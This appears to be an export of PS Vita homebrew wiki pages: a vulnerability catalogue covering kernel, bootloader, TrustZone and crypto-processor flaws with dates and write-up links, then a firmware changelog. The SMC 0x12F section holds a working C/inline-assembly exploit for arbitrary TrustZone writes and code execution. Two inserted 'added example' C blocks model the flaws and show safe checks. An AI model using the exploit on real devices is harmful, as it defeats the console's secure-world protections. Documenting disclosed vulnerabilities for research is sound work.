If len is negative, adding it to dst yields a value smaller than dst due to integer overflow. As a consequence, the later comparison evaluates to false regardless of whether it is a signed or unsigned comparison, and memcpy believes there are fewer than 32 bytes to copy.<br />
<br />
==== memcpy length comparison as signed integer ====<br />
<br />
At some point in the memcpy function, the length is compared as a signed integer. Hence a negative length simply bypasses the copy loop.<br />
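As an added example covering both memcpy bugs above (a model in C, not the actual Vita memcpy), the following code reproduces the two flawed checks in 32-bit arithmetic, then shows the overflow-proof way to write the same range check and a copy wrapper that applies it. The function and parameter names are constructed for the demonstration.<br />

```c
#include <stdint.h>
#include <stdbool.h>
#include <string.h>

/*
 * Added example, not the Vita's memcpy: the two flawed checks described above
 * modelled with 32-bit arithmetic (as on the Vita's ARM core), next to the
 * overflow-proof form of the same range check. A "negative length" is just a
 * very large unsigned value such as 0xFFFFFFF0.
 */

/* Bug 1 model: deciding whether there are fewer than 32 bytes to copy by
 * looking at dst + len. For a negative len the sum wraps below dst, so the
 * copy looks tiny whatever the comparison's signedness. */
bool model_believes_small_copy(uint32_t dst, int32_t len)
{
    uint32_t end = dst + (uint32_t)len;      /* wraps for len < 0 */
    return end < dst + 32u;
}

/* Bug 2 model: a copy loop guarded by a signed comparison. Returns how many
 * bytes the loop would move; a negative len makes it zero. */
uint32_t model_signed_loop_bytes(int32_t len)
{
    uint32_t moved = 0;
    for (int32_t i = 0; i < len; i++) moved++;
    return moved;
}

/* Bounds check written the wrong way round: dst + len can wrap past the end
 * of the address space and "pass". */
bool range_check_wrapping(uint32_t dst, uint32_t len, uint32_t region_end)
{
    return dst + len <= region_end;
}

/* Overflow-proof form: never add to the pointer; compare the length against
 * the space that remains, a subtraction that cannot wrap once dst is known to
 * sit inside [region_start, region_end]. */
bool range_check_safe(uint32_t dst, uint32_t len, uint32_t region_start, uint32_t region_end)
{
    if (dst < region_start || dst > region_end) return false;
    return len <= region_end - dst;
}

/* A memcpy front-end that applies the safe check before touching memory and
 * copies nothing on a bad range. The destination region is the caller's
 * buffer, described by its size; off is the offset written within it. */
bool checked_copy(uint8_t *dst_buf, uint32_t dst_size, uint32_t off,
                  const uint8_t *src, uint32_t len)
{
    if (!range_check_safe(off, len, 0, dst_size)) return false;
    memcpy(dst_buf + off, src, len);
    return true;
}

/* Constructed run: the "negative" length is refused, a real one goes through. */
int demo_checked_copy(void)
{
    uint8_t buf[64] = {0};
    const uint8_t src[8] = {1, 2, 3, 4, 5, 6, 7, 8};
    if (checked_copy(buf, sizeof buf, 16, src, 0xFFFFFFF0u)) return 0;  /* must be refused */
    if (!checked_copy(buf, sizeof buf, 16, src, sizeof src)) return 0;  /* must succeed */
    return buf[16] == 1 && buf[23] == 8;
}
```

The wrapping check "passes" 0xFFFFFFF0 bytes at 0x1000 because the sum wraps to 0xFF0, well below the region end; the safe form compares the length against the space left in the region instead, so the same length is refused before any copy happens.<br />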
<br />
=== Kernel stack leak in sceUdcdGetDeviceInfo ===<br />
<br />
Discovered on 2018-10-09 by TheFloW. Implemented in Trinity by TheFloW.<br />
<br />
[https://theofficialflow.github.io/2019/06/18/trinity.html#stack-disclosure writeup]<br />
<br />
Fixed on 3.71.<br />
<br />
=== Heap overflow in WLAN command 0x50120004 ===<br />
<br />
Discovered on 2018-09-26 by TheFloW. Implemented in Trinity by TheFloW.<br />
<br />
[https://theofficialflow.github.io/2019/06/18/trinity.html#heap-overflow writeup]<br />
<br />
Fixed on 3.71.<br />
<br />
== Non-secure Boot Loader (NSBL) ==<br />
<br />
=== Ensō ===<br />
<br />
Released on 2017-07-29 by Team Molecule. Patched in 3.67.<br />
<br />
[https://yifan.lu/2017/07/31/henkaku-enso-bootloader-hack-for-vita yifan's write-up]<br />
<br />
[https://github.com/henkaku/enso enso source code]<br />
<br />
==== Buffer overflow during eMMC init ====<br />
<br />
2016 - Yifan Lu discovers a buffer overflow in NSBL that occurs during eMMC initialization. With kernel execution, we can modify the eMMC MBR to change the block size. At the time, yifan was trying to exploit it with an adjacent malloc (controlled_size), couldn't find a way, and left it there.<br />
<br />
==== Logic flaw about error checking ====<br />
<br />
2017-04-30 - xyz finds a way to exploit the NSKBL eMMC buffer overflow. He discovers a logic flaw related to error code propagation in NSKBL: a function does not check an error return, and if it did, the value corrupted by the buffer overflow would not have been used. Later on, the field that was written is used in a separate call.<br />
<br />
This allows a usable buffer overflow in the data section and early code execution on the ARM core in non-secure privileged mode.<br />
<br />
== [[Secure_World|Secure World (TrustZone)]] ==<br />
<br />
A list of the 1.80 TrustZone modules' imports/exports is available [https://pastebin.com/59pe8jBg here].<br />
<br />
=== SMC 0x12F does not validate arguments (arbitrary read/write and code execution) ===<br />
<br />
Discovered on 2017-01-01 by Mike H. No public implementation except in write-up.<br />
<br />
[https://hexkyz.blogspot.com/2017/02/the-aftermath-tale-of-secure-worlds.html?m=1 writeup by Mike H.]<br />
<br />
See also [[SceSblSmschedProxy#sceSblSmSchedProxyGetStatusForKernel|sceSblSmSchedProxyGetStatusForKernel]].<br />
<br />
SMC 0x12F (sceSblSmSchedGetStatusMonitorCall) takes two unchecked arguments: <code>sm_handle</code> and <code>shared_mem_index</code>.<br />
<br />
<code>sm_handle</code> is a pointer to TrustZone memory in the form of <code>(tz_addr >> 0x01)</code> and <code>shared_mem_index</code> is an integer value calculated as <code>((shared_mem_blk_addr - shared_mem_base_addr) / 0x80)</code>.<br />
<br />
By passing the right value as <code>sm_handle</code>, SMC 0x12F will read 0x08 bytes from <code>(tz_addr + 0x28)</code> and return them at <code>(shared_mem_base_addr + index * 0x80)</code>, which translates to an arbitrary TrustZone memory leak (0x08 bytes only).<br />
<br />
By passing the right value as <code>shared_mem_index</code>, it is also possible to write the leaked data into an arbitrary TrustZone memory region.<br />
The Non-secure Kernel sees the shared memory region at <code>0x00400000</code> (size 0x5000 bytes) and the Secure Kernel sees the exact same region at <code>0x00560000</code>, making it possible to plant data inside the Non-secure Kernel's view of the region and have the SMC copy it somewhere into TrustZone memory (e.g. the SMC table). This results in TrustZone-level arbitrary code execution.<br />
<br />
Example code exploiting this vulnerability for writing 8 bytes from Non-secure Kernel to TrustZone:<br />
<br />
<source lang="c"><br />
#include <stdint.h><br />
#include <string.h><br />
<br />
/* Copies 8 bytes from src (Non-secure Kernel memory) to dst (TrustZone address) */<br />
void tz_memcpy_8(uintptr_t dst, const void *src)<br />
{<br />
    /* plant the 8 bytes where SMC 0x12F reads them: shared region + 0x28, Non-secure Kernel view */<br />
    memcpy((void *)0x00400028, src, 8);<br />
<br />
    /* sm_handle: the shared region as the Secure Kernel sees it, encoded as (tz_addr >> 1) */<br />
    uintptr_t sm_handle = 0x00560000 >> 1;<br />
    /* index of the 0x80-byte block at dst, relative to the Secure Kernel's view of the region */<br />
    uintptr_t shared_mem_index = (dst - 0x00560000) / 0x80;<br />
<br />
    /* r0 = sm_handle, r1 = shared_mem_index, r12 = SMC number; explicit register variables<br />
       keep the compiler from allocating an input to a register the asm would overwrite */<br />
    register uintptr_t r0 asm("r0") = sm_handle;<br />
    register uintptr_t r1 asm("r1") = shared_mem_index;<br />
    register uintptr_t r12 asm("r12") = 0x12F;<br />
    asm volatile("smc #0" : "+r"(r0) : "r"(r1), "r"(r12) : "memory");<br />
}<br />
</source><br />
<br />
To achieve code execution, dst must be set to the SMC table address in order to plant 2 pointers (8 = 2*4 bytes).<br />
<br />
Patched somewhere after 1.80 and before 2.10.<br />
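As an added example (not SCE's code nor the write-up's), the following C block spells out the SMC 0x12F address arithmetic given above, both views of the shared region, and the argument validation a hardened handler would perform before touching memory. The shared-region constants are those from the text; the secure-module pool bounds (SM_POOL_BASE, SM_POOL_SIZE, SM_OBJ_SIZE) are hypothetical placeholders.<br />

```c
#include <stdint.h>
#include <stdbool.h>

/*
 * Added example, not SCE's or the write-up's code: the address arithmetic of
 * SMC 0x12F as described above, and the argument validation the handler lacks.
 * The shared-region constants come from the text; the handle-pool bounds below
 * are assumptions made for the demonstration.
 */
#define NS_SHARED_BASE   0x00400000u   /* shared region, Non-secure Kernel view */
#define TZ_SHARED_BASE   0x00560000u   /* same region, Secure Kernel view */
#define SHARED_SIZE      0x5000u
#define SHARED_BLK_SIZE  0x80u
#define SHARED_BLOCKS    (SHARED_SIZE / SHARED_BLK_SIZE)   /* 0xA0 blocks */
#define SM_STATUS_OFFSET 0x28u         /* the 8 bytes are read from tz_addr + 0x28 */

/* Hypothetical pool of secure-module objects a genuine handle must point into. */
#define SM_POOL_BASE 0x00500000u
#define SM_POOL_SIZE 0x00010000u
#define SM_OBJ_SIZE  0x100u

/* Encodings used by the SMC, as stated above. */
uint32_t sm_handle_encode(uint32_t tz_addr)  { return tz_addr >> 1; }
uint32_t sm_handle_decode(uint32_t handle)   { return handle << 1; }
uint32_t shared_index_of(uint32_t blk_addr)  { return (blk_addr - TZ_SHARED_BASE) / SHARED_BLK_SIZE; }
uint32_t shared_addr_of_index(uint32_t idx)  { return TZ_SHARED_BASE + idx * SHARED_BLK_SIZE; }

/* Same physical bytes, two views: what the Non-secure Kernel writes at
 * NS_SHARED_BASE + x, the Secure Kernel reads at TZ_SHARED_BASE + x. */
uint32_t ns_shared_to_tz(uint32_t ns_addr) { return ns_addr - NS_SHARED_BASE + TZ_SHARED_BASE; }

/* What the unchecked handler ends up doing: an 8-byte copy from src to dst. */
struct smc12f_copy { uint32_t src; uint32_t dst; };
struct smc12f_copy smc12f_unchecked(uint32_t sm_handle, uint32_t shared_mem_index)
{
    struct smc12f_copy c;
    c.src = sm_handle_decode(sm_handle) + SM_STATUS_OFFSET;
    c.dst = shared_addr_of_index(shared_mem_index);
    return c;
}

/* The validation that was missing: the index must select a block inside the
 * shared region, and the handle must decode to an object inside the module
 * pool, on an object boundary. Both checks run before any arithmetic that
 * could wrap around. */
bool smc12f_args_valid(uint32_t sm_handle, uint32_t shared_mem_index)
{
    if (shared_mem_index >= SHARED_BLOCKS) return false;
    uint32_t tz_addr = sm_handle_decode(sm_handle);
    if (tz_addr < SM_POOL_BASE || tz_addr - SM_POOL_BASE >= SM_POOL_SIZE) return false;
    if ((tz_addr - SM_POOL_BASE) % SM_OBJ_SIZE != 0) return false;
    return true;
}
```

With the index bounded to the 0xA0 blocks of the shared region and the handle required to decode to an object inside the pool, the handle used in the example above (the shared region itself) and any index reaching outside the region are both refused.<br />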
<br />
== Hardware ==<br />
<br />
=== DMAC5 crypto engine allows partial AES key overwrite ===<br />
<br />
(2017-02-01) The Dmac5 crypto engine, accessible from the kernel, allows writing 4 bytes of key material at a time. This makes it possible to recover plaintext AES keys by brute force.<ref>https://yifan.lu/2017/02/19/psvimgtools-decrypt-vita-backups/</ref><br />
<br />
=== Bigmac leaves result of previous AES operation in the internal buffer allowing for derived key recovery ===<br />
<br />
(2017-04-21) See https://lolhax.org/2019/01/02/extracting-keys-f00d-crumbs-raccoon-exploit/<br />
<br />
== F00D Processor ==<br />
<br />
=== octopus exploit ===<br />
<br />
(2017-02-18) The f00d secure_kernel module loading does not check the source address and therefore provides an oracle allowing for memory dumps. See https://teammolecule.github.io/35c3-slides/<br />
<br />
Fixed in 1.80.<br />
<br />
=== Heap buffer overflow in update_service_sm ===<br />
<br />
(2017-02-23) A heap buffer overflow exists in update_service_sm.<ref>https://yifan.lu/2019/01/11/the-first-f00d-exploit/</ref><br />
<br />
=== Petite Mort ===<br />
<br />
(2018-07-27) jebaited, not an exploit. Just [https://github.com/TeamMolecule/petite-mort tools used to glitch bootrom].<br />
<br />
=== moth exploit ===<br />
<br />
(2019-02-05) To be disclosed.<br />
<br />
== References ==<br />
<references/><br />
<br />
[[Category:Vulnerabities]]</div>Xyzhttp://wiki.henkaku.xyz/vita/index.php?title=System_Software&diff=11298System Software2019-07-23T22:19:50Z<p>Xyz: </p>
<hr />
<div>== History of updates ==<br />
Originally taken from [https://en.wikipedia.org/w/index.php?title=PlayStation_Vita_system_software&oldid=746007330 Wikipedia].<br />
<br />
=== Version 1 ===<br />
{| class="wikitable"<br />
|-<br />
! style="width:180px;"|Version<br>Release date (UTC)<br><sup>''Notes''</sup><br />
!class="unsortable"|Description<br />
|-<br />
|align=center|'''1.03'''<br />December 17, 2011<br />
|<br />
* Japanese release firmware<br />
|-<br />
|align=center|'''1.04'''<br />December 17, 2011<br />
|<br />
* Provided only with Shin Kamaitachi no Yoru: 11 Hitome no Suspect<br />
|-<br />
|align=center|'''1.05'''<br />December 17, 2011<br />
|<br />
* Japanese release firmware<br />
|-<br />
|align=center|'''1.06'''<br />February 15, 2012<br />
|<br />
* EU release firmware<br />
* US First Edition Bundle release firmware<br />
|-<br />
|align=center|'''1.50'''<br />December 17, 2011<br />
|<br />
;System<br />
* Support for the PlayStation Vita cradle.<br />
|-<br />
|align=center|'''1.51'''<br />December 27, 2011<br />
|<br />
;System<br />
* Addresses freezing issues with certain games.<br />
|-<br />
|align=center|'''1.52'''<br />January 16, 2012<br />
|<br />
;System<br />
*Improved system stability.<br />
*The 1.51 bug where the 3G/Wi-Fi SKU would not recognize a SIM card has been fixed.<ref>http://www.theverge.com/gaming/2012/1/16/2712066/playstation-vita-updated-to-version-1-52-in-japan-fixes-3g-sim</ref><br />
|-<br />
|align=center|'''1.60'''<ref>http://play-beyond.net/2012/02/08/ps-vita-system-update-1-60-full-change-log/</ref><br />February 8, 2012<br />
|<br />
;Apps<br />
*An application powered by Google Maps has been added.<br />
<br />
;Near<br />
*In [near], information about players is now displayed on the [Discoveries] screen.<br />
<br />
;Content Manager<br />
*Users can now delete backup files in [Content Manager].<br />
<br />
;Photos<br />
*Users can now record video under the [Photos] application.<br />
<br />
;System<br />
*The PS button will now flash blue while the battery is charging.<br />
*In [Settings], the position where [Flight Mode] appears has been changed.<br />
*You can now publish stories about the products that you rate in PlayStation Store to Facebook.<br />
*You can now report inappropriate messages in [Group Messaging] and inappropriate comments about an activity.<br />
*“PlayStation Network account” has been renamed to “Sony Entertainment Network account”.<br />
|-<br />
|align=center|'''1.61'''<ref>http://blog.us.playstation.com/2012/02/20/ps-vita-system-software-update-v1-61</ref><br />February 21, 2012<br />
|<br />
;System<br />
*Improves certain aspects of the system software.<br />
*Fixed [[Vulnerabilities#Syscall_handler_doesn.27t_check_syscall_number|SVC table overflow vulnerability]]. (Pretty sure this is the version they fixed it in [[User:Xyz|Xyz]] ([[User talk:Xyz|talk]]) 04:24, 19 April 2017 (UTC))<br />
|-<br />
|align=center|'''1.65'''<ref>http://blog.us.playstation.com/2012/04/02/ps-vita-system-software-update-v1-65</ref><br />April 3, 2012<br /><small>''Replaced with 1.66''</small><br />
|<br />
;System<br />
* [Notification Alert] has been added to [Settings], allowing users to toggle alerts on and off.<br />
* [After 10 Minutes] has been added to time options under [Power Save Settings].<br />
* Caps Lock is now supported in the On Screen Keyboard.<br />
* An arrow icon will now display when PS Vita finds new activities in the LiveArea.<br />
* Addition of installation progress bar for downloaded games and DLC.<br />
* minis with a pre-set expiry date (such as those obtained via PlayStation Plus) now load correctly.<br />
* Fixes security issues with two PSP games that allowed users to run unauthorized content on the device through an exploit.<ref>http://wololo.net/wagic/2012/04/04/ps-vita-firmware-update-1-66-available/</ref> <br />
|-<br />
|align=center|'''1.66'''<ref>http://www.engadget.com/2012/04/04/playstation-vita-1-66-firmware-update/</ref><br />April 4, 2012<br />
|<br />
;System<br />
* Fixed problems which appeared in 1.65<br />
* [Settings]<br />
* The [System Music] setting in [Settings] > [Sound and Display] now affects background music in [PS Store], [near], the Sign-Up screens, and the Home menu.<br />
* The display time of notification alerts has been reduced from 5 seconds to 3 seconds.<br />
* Functional improvements have been made in the following games and applications: Unit 13, Gravity Daze, near.<br />
<br />
;Near<br />
* When searching for location data, users now have the option to [Retry] and [Cancel] when a failure occurs.<br />
* A direct link to [PS Store] is made available for new applications that users may discover on [near].<br />
* Users can now update data at any time within [near], provided they are within the same location.<br />
|-<br />
|align=center|'''1.67'''<ref>http://exophase.com/36431/ps-vita-firmware-1-67-goes-live/</ref><br />April 11, 2012<br />
|<br />
;System<br />
* Resolves an issue with the camera functionality when playing ''Dream Club Zero Portable''.<ref>http://www.jp.playstation.com/psvita/update/</ref> <br />
|-<br />
|align=center|'''1.69'''<ref>http://blog.us.playstation.com/2012/06/11/ps-vita-at-e3-minor-system-software-update-coming/</ref><br />June 11, 2012<br /><small>''Optional''</small><br />
|<br />
;System<br />
* Improved system stability<br />
* A savegame exploit within Super Collapse 3 has been patched, disallowing the usage of VHBL via the game.<ref>12 June 2012, [http://wololo.net/2012/06/12/ps-vita-firmware-1-69-patches-the-super-collapse-3-exploit/ PS Vita Firmware 1.69 patches the Super Collapse 3 exploit], Wololo.net</ref><br />
* Resolves a compatibility issue with the PlayStation Portable game ''Conception: Ore no Kodomo wo Undekure!''.<ref>http://andriasang.com/con1f1/conception_firmware/</ref> <br />
|-<br />
|align=center|'''1.691'''<br />July 4, 2012<br /><small>''Optional''</small><br />
|<br />
;System<br />
* Resolves a compatibility issue with the PS Vita demo for ''Escape Plan''.<br />
|-<br />
|align=center|'''1.80'''<ref>[http://blog.us.playstation.com/2012/08/14/psone-classics-coming-to-ps-vita-via-the-latest-system-software-update-v1-80/ PSone Classics Coming to PS Vita via the latest System Software Update (v1.80) – PlayStation.Blog]. Blog.us.playstation.com (2012-08-14). Retrieved on 2013-08-23.</ref><br />August 28, 2012<br />
|<br />
;System<br />
* Users can now control the home screen, as well as some applications like [Music] and [Video], with the PS Vita system's buttons.<br />
* Notification settings under [Sound & Display Settings] have been moved to their own [Notification Settings] menu.<br />
* The items under [Date & Time] > [Date & Time Settings] have been changed.<br />
* A Japanese keyboard has been added.<br />
* Memory cards are now locked to PSN accounts, to prevent users from switching between accounts. The system will refuse to accept a memory card locked to another account unless the memory card is reformatted.<ref>http://i.imgur.com/4nsEl.jpg</ref><br />
* The layout of category lists has been improved in [Photos], [Music], and [Videos].<br />
* The [Notification Center] has been redesigned.<br />
* Importing content from a PC or PlayStation 3 has been improved.<br />
* The [Help] feature of the LiveArea has been improved.<br />
* Icons for some menu items have been changed.<br />
* Users can now report some errors to Sony Computer Entertainment.<br />
* Background colors have been changed.<br />
* Fixed a [[Vulnerabilities#Stack_buffer_overflow_in_sceSblDmac5EncDec|stack buffer overflow in sceSblDmac5EncDec]] and a ton of other vulns.<br />
<br />
;Remote Play<br />
* Added [Cross-Controller] feature to allow the PS Vita system to interact as a secondary controller with a PlayStation 3 system.<br />
<br />
;Games<br />
* Users can now play select PSone Classics from the PlayStation Store.<br />
* Users can now map more combinations of PSP system buttons to the PS Vita right analog stick when playing PSP games or minis. In addition, users can also map a PSP system button to each of the four corners of the PS Vita system touch screen.<br />
* [Import Saved Data] has been added to the LiveArea screen. This will only be shown for games that support this feature.<br />
<br />
;Photos<br />
* The MPO format can now be viewed on the PS Vita system. Additionally, it is now possible to transfer MPO files using a PlayStation 3 or PC using Content Manager. 3D and multi-angle viewing are not supported.<br />
<br />
;Music<br />
* Playlists in iTunes (10.6.3 or later), M3U, and M3U8 formats are now supported in [Music].<br />
* Playlists can also be transferred from a PS3 system.<br />
<br />
;Videos<br />
* Playback speed control and repeat play have been added to [Video].<br />
* When moving the progress bar during video playback, it now shows the image of the specified location in the video.<br />
* A thumbnail for videos will now be generated automatically when there is no thumbnail information available.<br />
* Users can now copy photos or videos to a PC or PS3 while a photo or video is displayed.<br />
<br />
;Friends<br />
* Users can now delete multiple friend requests simultaneously.<br />
<br />
;Near<br />
* [near] can now gather information of surrounding Wi-Fi access points without an Internet connection and will update location data based on this information at a later time.<br />
* The LiveArea screen for [near] has been improved and now shows lifetime statistics.<br />
<br />
;Group Messaging<br />
* There have been layout improvements made to [Group Messaging].<br />
* Users can now take photos using the camera to add as attachments in [Group Messaging].<br />
* The [New Message] button on the [Group Messaging] LiveArea screen has been removed.<br />
<br />
;Maps<br />
[Maps] has been improved by adding a button to the top of the screen to switch between [Search for Location] and [Search for Directions]. Users can also touch and hold a location on the map to place a flag.<br />
<br />
;Browser<br />
* The use of the rear touchpad for scrolling and zooming is now supported in the [Browser].<br />
* Users are no longer able to use a JavaScript bookmark trick to download YouTube videos in the [Browser].<br />
* A button has been added to the [Browser] to immediately go to the top of the page.<br />
<br />
;Party<br />
* Users can now view a history of up to 100 chat messages and information in [Party].<br />
|-<br />
|align=center|'''1.81'''<ref>[https://twitter.com/PlayStation/status/247851681428164609 Twitter / PlayStation: PS Vita system software update]. Twitter.com. Retrieved on 2013-08-23.</ref><br />September 17, 2012<br />
|<br />
;System<br />
* Software stability has been improved.<br />
* A savegame exploit within Monster Hunter Freedom Unite has been patched, disallowing the usage of VHBL via the game.<ref>18 September 2012, [http://wololo.net/2012/09/18/vita-firmware-1-81-is-out-patches-vhbl/ Vita Firmware 1.81 is out, patches VHBL], Wololo.net</ref><br />
<br />
;Treasure Park<br />
* An issue was resolved where the game would fail to load properly if the user had received too many treasure sheets.<br />
|-<br />
|}<br />
<br />
=== Version 2 ===<br />
{| class="wikitable"<br />
|-<br />
! style="width:180px;"|Version<br>Release date (UTC)<br><sup>''Notes''</sup><br />
!class="unsortable"|Description<br />
|-<br />
|align=center|'''2.00'''<ref>[http://blog.us.playstation.com/2012/11/13/playstation-plus-for-ps-vita-available-next-week-take-the-tour/ PlayStation Plus for PS Vita Available Next Week – Take the Tour – PlayStation.Blog]. Blog.us.playstation.com (2012-11-13). Retrieved on 2013-08-23.</ref><br />November 19, 2012<br />
|<br />
;System<br />
* System buttons can now be used in more applications.<br />
* Turkish has been added as a system language.<br />
* In [Settings], users can now set how they will be alerted depending on the type of notification.<br />
* [Disconnect Wi-Fi Connection Automatically] has been added to [Network] > [Wi-Fi Settings].<br />
* [PlayStation Network]<br />
* Support for PlayStation Plus has been added.<br />
* Users can now connect their PlayStation Network account to Twitter.<br />
* [Avatar], [Panel], [Online ID], [About Me] and [My Languages] under [PlayStation Network] > [Account Information] have been moved to the new category [Profile].<br />
* [PlayStation Mobile] has been added under [System].<br />
* Screenshots are now saved in the background.<br />
* Trophy synchronization is now performed in the background.<br />
* A savegame exploit within Urbanix has been patched.<br />
* Users can now delete screenshots or songs from PlayStation Portable games.<br />
<br />
;Content Manager<br />
* [Content Manager] has been redesigned.<br />
* Users can now transfer content to and from PlayStation Plus online storage, to and from a PS3, and to and from a PC via Wi-Fi.<br />
<br />
;Browser<br />
* The rendering engine has been improved.<br />
* The [Browser] now uses additional GPU processing power.<br />
* Tapping on a YouTube link will now open the respective video in the YouTube app.<br />
* The HTML5 and JavaScript engines have been upgraded.<br />
* Users can now send their current [Browser] URL using their Twitter settings.<br />
* Users can now access the [Browser] while in an application or game.<ref>Shuhei Yoshida on Twitter. https://twitter.com/yosp/status/270429820712783872</ref><br />
* A pointer can now be used (in conjunction with pressing L or R and tapping on the screen) to select links.<br />
<br />
;Apps<br />
* [Email] has been added as an application.<br />
<br />
;Maps<br />
* [Maps] can now display weather information for locations where it is available.<br />
<br />
;Near<br />
* The layout of [Near] has been revised.<br />
<br />
;Friends<br />
* The activities list for Friends has been moved to the LiveArea screen.<br />
* Users can now attach a comment when sending a friend request.<br />
* Users can now file a [Grief Report] for inappropriate comments when sent with a friend request.<br />
* TIFF, BMP, PNG, GIF, and MPO are now supported as file formats in [Group Messaging].<br />
<br />
;Videos<br />
* The PS Vita system can now display videos with 1080 resolution.<br />
* Videos can now display captioning.<br />
* Videos can now be played in slow motion.<br />
* Users can now skip chapters in videos.<br />
* Folders can now be transferred from a PS3 or PC to the PS Vita for [Photos] and [Videos].<br />
* When browsing lists in Music and Videos, titles will now scroll horizontally if they are too long.<br />
<br />
;PSone Classics<br />
* [Assign Touchscreen] and [Assign Rear Touch Pad] have been added to [Controller Settings].<br />
* [Custom] has been added to [Other Settings] > [Screen Mode].<br />
|-<br />
|align=center|'''2.01'''<ref>[http://www.playstationlifestyle.net/2012/12/03/ps-vita-firmware-v2-01-is-live-download-now/ PS Vita Firmware v2.01 is Live, Download Now]. Playstationlifestyle.net. Retrieved on 2013-08-23.</ref><br />December 3, 2012<br />
|<br />
;PlayStation Plus<br />
* Issue with the [Upload Automatically] setting for saved data has now been corrected.<br />
<br />
;System<br />
* Improved system stability<br />
|-<br />
|align=center|'''2.02'''<ref>[http://www.playstationlifestyle.net/2012/12/18/playstation-vita-system-software-version-2-02-now-available-for-download/ PlayStation Vita System Software Version 2.02 Now Available For Download]. Playstationlifestyle.net. Retrieved on 2013-08-23.</ref><br />December 19, 2012<br />
|<br />
;System<br />
* Improved system stability<br />
|-<br />
|align=center|'''2.05'''<ref>[http://www.playstationlifestyle.net/2013/01/22/ps-vita-system-software-version-2-05-likely-coming-today-seems-to-be-mandatory/ PS Vita System Software Version 2.05 Likely Coming Today, Seems to be Mandatory]. PlayStation LifeStyle. Retrieved on 2013-08-23.</ref><br />January 24, 2013<br />
|<br />
;System<br />
* Improved system stability<br />
* Closes exploit in UNO game. <br />
|-<br />
|align=center|'''2.06'''<ref>[https://twitter.com/PlayStation/status/311264776577765376 Twitter / PlayStation: Heads up - PS Vita v2.06 software]. Twitter.com. Retrieved on 2013-08-23.</ref><br />March 12, 2013<br />
|<br />
;System<br />
* Improved system stability<br />
* Closes exploit in Dissidia Duodecim PSP game.<br />
* Closes JavaScript URL spoofing exploit in Browser.<ref>[http://www.securityfocus.com/archive/1/525576 Sony Playstation Vita Browser - firmware 2.05 - Adressbar spoofing]. Securityfocus.com. Retrieved on 2013-12-09.</ref><br />
|-<br />
|align=center|'''2.10'''<ref>[http://blog.us.playstation.com/2013/04/09/ps-vita-system-software-update-v-2-10/ PS Vita System Software Update (v.2.10) – PlayStation.Blog]. Blog.us.playstation.com (2013-04-09). Retrieved on 2013-08-23.</ref><ref>[http://uk.playstation.com/psvita/support/system-software/detail/item596991/Update-features-%28ver-2-10%29/ Update features (ver 2.10) - PS Vita System Software]. Uk.playstation.com. Retrieved on 2013-08-23.</ref><br />April 9, 2013<br />
|<br />
;System<br />
* Users can now create folders, with a maximum of 10 icons per folder, and up to 100 icons (including folders) on the home screen.<br />
* Users can now verify which PS Vita card is in their system by looking at the information bar.<br />
* Users can now save home screen layouts per PS Vita card.<br />
* When [Mute Automatically] is toggled in [Settings], the PS Vita will mute speakers when a headset is unplugged. Similarly, music will now pause if a headset is unplugged when the music app is used.<br />
* [Use Wi-Fi in Power Save Mode] has been added to [Power Save Settings].<br />
* [Disconnect Wi-Fi Connection Automatically] has been removed.<br />
* Patches an exploit in the game Apache Overkill.<ref>09 September 2013, [http://wololo.net/2013/04/10/mandatory-vita-2-10-update-live-and-blocks-apache-overkill-exploit/ Mandatory Vita 2.10 Update Live and Blocks Apache Overkill Exploit], Wololo.net</ref><br />
<br />
;PlayStation Plus<br />
* PlayStation Plus members can now automatically update [PlayStation Mobile] software and upload game save data using a 3G connection.<br />
* Users can now upload or download game save data using a 3G network.<br />
<br />
;Browser<br />
* Video support within the [Browser] has been added (a memory card is required; some videos are not supported).<br />
<br />
;Email<br />
* Enhancements to [Email] now allow users to view HTML messages, add multiple email addresses to contacts, and search messages.<br />
<br />
;Group Messaging<br />
* Users can now send messages to multiple recipients.<br />
<br />
;Photos<br />
* Still images can now be displayed in high resolution when zoomed in.<br />
<br />
;Content Manager<br />
* Users can now check for system updates when plugging their PS Vita into their PS3 system. The system version of the PS3 must be 4.40 or higher.<br />
* Users can now add a name for the PS Vita backup data when saving to a PS3 or PC. The system version of the PS3 must be 4.40 or higher, and the Content Manager Assistant application must be updated.<br />
<br />
;PlayStation Store<br />
* When reporting PlayStation Mobile content as inappropriate, users can now include details.<br />
|-<br />
|align=center|'''2.11'''<ref>[http://www.psu.com/a019092/PS-Vita-firmware-211-is-now-live [UPDATE&#93; PS Vita firmware 2.11 is now live - PlayStation Universe]. Psu.com (2013-04-16). Retrieved on 2013-08-23.</ref><br />April 16, 2013<br />
|<br />
;System<br />
* Improved system stability.<br />
* Stabilizes the playback of certain titles.<br />
|-<br />
|align=center|'''2.12'''<ref>[http://terminalgamer.com/2013/05/07/optional-ps-vita-system-update-2-12-live-now/ Optional PS Vita System Update 2.12 Live Now]. Terminal Gamer (2013-05-08). Retrieved on 2013-08-23.</ref><br />May 8, 2013<br />
|<br />
;System<br />
* Improved system stability.<br />
|-<br />
|align=center|'''2.50'''<br />''Pre-installed Only''<br><br />
First found on October 10, 2013<br />
|<br />
;System<br />
*This firmware was only available pre-installed on the initial release of the PCH-2000 model.<br />
*It adds support for PlayStation Vita Slim (PCH-2000), but otherwise the firmware is identical to the previous version (2.12).<br />
|-<br />
|align=center|'''2.60'''<ref>[http://www.playstationlifestyle.net/2013/08/05/ps-vita-firmware-update-v2-60-released-download-now/ PS Vita Firmware Update v2.60 Released, Download Now]. PlayStation LifeStyle. Retrieved on 2013-08-23.</ref><ref>[http://wololo.net/2013/08/06/psvita-mandatory-ofw-2-60-now-live/ PSVITA Mandatory OFW 2.60 Now Live ·]. Wololo.net (2013-08-06). Retrieved on 2013-08-23.</ref><br />August 5, 2013<br />
|<br />
* Default release firmware for the PlayStation Vita TV in Japan.<br />
;System<br />
* [Devices] has been added under [Settings].<br />
** [Bluetooth Settings] has been moved to [Devices].<br />
* The Quick Access Menu when the PS button is held has been improved.<br />
* Stability improvements.<br />
* Anti-aliasing has been applied to home screen icons.<br />
* Closes exploit in Gamocracy One: Legend of Robot.<br />
* Closes undisclosed exploit in Pool Hall Pro.<br />
* Fixes screenshot compression bug for ''Gravity Rush'' and ''Everybody's Golf'' introduced in firmware 2.10.<br />
<br />
;LiveArea<br />
* The LiveArea for [Content Manager] and [Photos] has been updated.<br />
<br />
;PlayStation Plus<br />
* A [PlayStation Plus] icon has been added to the LiveArea to allow users to easily upload or download saved data.<br />
<br />
;Browser<br />
* Video support within the [Browser] has been extended.<br />
<br />
;Content Manager<br />
* Users can now use content on a remote system before transferring it.<br />
<br />
;Trophies<br />
